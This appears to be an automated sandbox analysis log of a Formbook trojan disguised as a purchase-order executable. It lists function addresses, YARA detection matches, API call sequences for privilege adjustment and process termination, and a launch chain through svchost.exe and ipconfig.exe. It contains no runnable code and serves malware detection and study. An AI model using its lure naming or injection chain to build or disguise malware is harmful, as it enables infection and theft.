          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039005355_2_03900535
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039AE4F65_2_039AE4F6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039A44205_2_039A4420
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039B24465_2_039B2446
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039B6BD75_2_039B6BD7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BAB405_2_039BAB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_038FEA805_2_038FEA80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039029A05_2_039029A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039CA9A65_2_039CA9A6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039169625_2_03916962
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_038E68B85_2_038E68B8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0392E8F05_2_0392E8F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0390A8405_2_0390A840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039028405_2_03902840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0397EFA05_2_0397EFA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_038F2FC85_2_038F2FC8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0390CFE05_2_0390CFE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03920F305_2_03920F30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039A2F305_2_039A2F30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03942F285_2_03942F28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03974F405_2_03974F40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03912E905_2_03912E90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BCE935_2_039BCE93
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BEEDB5_2_039BEEDB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BEE265_2_039BEE26
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03900E595_2_03900E59
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03918DBF5_2_03918DBF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_038FADE05_2_038FADE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0399CD1F5_2_0399CD1F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0390AD005_2_0390AD00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039A0CB55_2_039A0CB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_038F0CF25_2_038F0CF2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03900C005_2_03900C00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0394739A5_2_0394739A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039B132D5_2_039B132D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_038ED34C5_2_038ED34C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039052A05_2_039052A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0391B2C05_2_0391B2C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039A12ED5_2_039A12ED
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0390B1B05_2_0390B1B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039CB16B5_2_039CB16B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_038EF1725_2_038EF172
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0393516C5_2_0393516C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039070C05_2_039070C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039AF0CC5_2_039AF0CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039B70E95_2_039B70E9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BF0E05_2_039BF0E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BF7B05_2_039BF7B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039B16CC5_2_039B16CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039456305_2_03945630
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0399D5B05_2_0399D5B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039C95C35_2_039C95C3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039B75715_2_039B7571
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BF43F5_2_039BF43F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_038F14605_2_038F1460
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0391FB805_2_0391FB80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03975BF05_2_03975BF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0393DBF95_2_0393DBF9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BFB765_2_039BFB76
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03945AA05_2_03945AA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0399DAAC5_2_0399DAAC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039A1AA35_2_039A1AA3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039ADAC65_2_039ADAC6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BFA495_2_039BFA49
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039B7A465_2_039B7A46
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03973A6C5_2_03973A6C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039959105_2_03995910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039099505_2_03909950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0391B9505_2_0391B950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039038E05_2_039038E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0396D8005_2_0396D800
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03901F925_2_03901F92
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BFFB15_2_039BFFB1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BFF095_2_039BFF09
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03909EB05_2_03909EB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0391FDC05_2_0391FDC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039B1D5A5_2_039B1D5A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03903D405_2_03903D40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039B7D735_2_039B7D73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BFCF25_2_039BFCF2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03979C325_2_03979C32
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FCC3F25_2_02FCC3F2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FCE79D5_2_02FCE79D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FB9E505_2_02FB9E50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FB9E4C5_2_02FB9E4C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FB2FB05_2_02FB2FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FB2D905_2_02FB2D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037AA0365_2_037AA036
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037A5B325_2_037A5B32
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037A5B305_2_037A5B30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037AB2325_2_037AB232
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037A89125_2_037A8912
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037A10825_2_037A1082
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037A2D025_2_037A2D02
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037AE5CD5_2_037AE5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 102 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 280 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0397F290 appears 105 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 038EB970 appears 280 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 03947E54 appears 111 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0396EA12 appears 86 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 03935130 appears 58 times
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: String function: 004115D7 appears 36 times
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: String function: 00416C70 appears 39 times
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: String function: 00445AE0 appears 55 times
          Source: Purchase order MIPO2425110032.exe, 00000000.00000003.2046861450.0000000004663000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase order MIPO2425110032.exe
          Source: Purchase order MIPO2425110032.exe, 00000000.00000003.2045016582.000000000480D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase order MIPO2425110032.exe
          Source: Purchase order MIPO2425110032.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Purchase order MIPO2425110032.exe PID: 2520, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 1396, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ipconfig.exe PID: 6000, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@1033/1@5/1
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeFile created: C:\Users\user\AppData\Local\Temp\harrowmentJump to behavior
          Source: Purchase order MIPO2425110032.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Purchase order MIPO2425110032.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeFile read: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe"
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
